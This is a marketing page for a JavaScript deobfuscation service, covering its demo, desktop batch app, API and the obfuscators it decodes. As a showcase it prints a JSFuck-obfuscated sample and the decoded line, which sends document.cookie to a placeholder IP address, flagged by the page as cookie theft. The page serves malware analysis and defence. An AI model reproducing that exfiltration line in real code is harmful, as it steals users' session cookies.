Sample 933cd23bSHA-256 933cd23b749d…7dd1f9Static analysis · never executed
Obfuscated JavaScript, unreadable read back as plain code.
Paste a packed, string-array or JSFuck sample. Defuscator undoes the layers without running a single line, then tells you what the code would have done and where it would have sent your data.
Exhibit A · received10,012 bytes
[][(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]…
Exhibit B · decodedJSFuck · 1 layer
fetch("https://198.51.100.42/c?d="+document.cookie)
- Indicators
- 198.51.100.42 · https://198.51.100.42/c?d=
- Behaviour
- Reads cookies, sends them to a remote host
- Scores
- Obfuscation 85 · capability risk 80
Windows desktop app
A whole folder of scripts, in one run.
Point the Defuscator Batch Processor at a folder of JavaScript and an output folder. Every .js file is analysed with your API key; the decoded files and a batch-summary.csv land on your disk, in the same folder structure.
- Includes subfolders, with limits on file count and size
- Risk, obfuscator family and techniques for every file
- Cancel at any time; credits used and remaining after each run
Windows 10/11 x64 · portable ZIP, no installer · needs a Defuscator API key
Defuscator Batch Processor─ □ ✕
InputD:\samples\incident-0412\
OutputD:\samples\incident-0412-decoded\
| File | Risk | Techniques | Status |
| nested\atob.js | 38 | Network endpoint reference, high entropy | Done |
| nested\hex.js | 24 | Network endpoint reference | Done |
| packer.js | 0 | P.A.C.K.E.R. layer decoded | Done |
| clean.js | 0 | No obfuscation detected | Done |
| big.js | – | Larger than the plan's API size limit | Skipped |
5 files · 4 analysed · 1 skippedSummary: batch-summary.csv
What it takes apart
Measured against the real obfuscators in a public benchmark, including the cases it still fails.
| Technique | Result | Notes |
| obfuscator.io string arrays | Decoded | Rotation, base64 and RC4 encodings, wrappers and proxy functions |
| Dean Edwards P.A.C.K.E.R. | Decoded | Base 10 to 62, any parameter names, nested layers |
| JSFuck | Decoded | By modelling the type coercions, not by evaluating the sample |
| JS-Confuser | Strings decoded | Virtual-machine presets are identified and reported, not decoded |
| Hex, unicode and char-code escapes | Decoded | Including atob, unescape and String.fromCharCode |
| Inline source maps | Recovered | Original files restored from embedded sourcesContent |
| JJEncode and AAEncode | Detected | Flagged in the report; not decoded yet |
Where you can run it
-
In the browser
The demo decodes one sample at a time and shows the decoded code, the indicators and both scores. Nothing to install.
Open the demo
-
On a whole folder
The Windows desktop app sends every .js file in a folder to the analyzer with your API key and writes the decoded files and a CSV summary back to disk.
Get the desktop app
-
In your pipeline
The REST API, the command line and the GitHub Action return JSON or SARIF, and the exit code can fail a build on deliberately unreadable code.
Read the API docs
Start free, pay for volume
The demo is free. Credit packs add the dashboard, API keys, ZIP and desktop batches, and saved reports.
See pricing
Protecting your own code instead?
Defuscator takes obfuscation apart. For the opposite job, JavaScript Obfuscator is a commercial obfuscator for code you publish, with an online tool, desktop app, CLI and build plugins.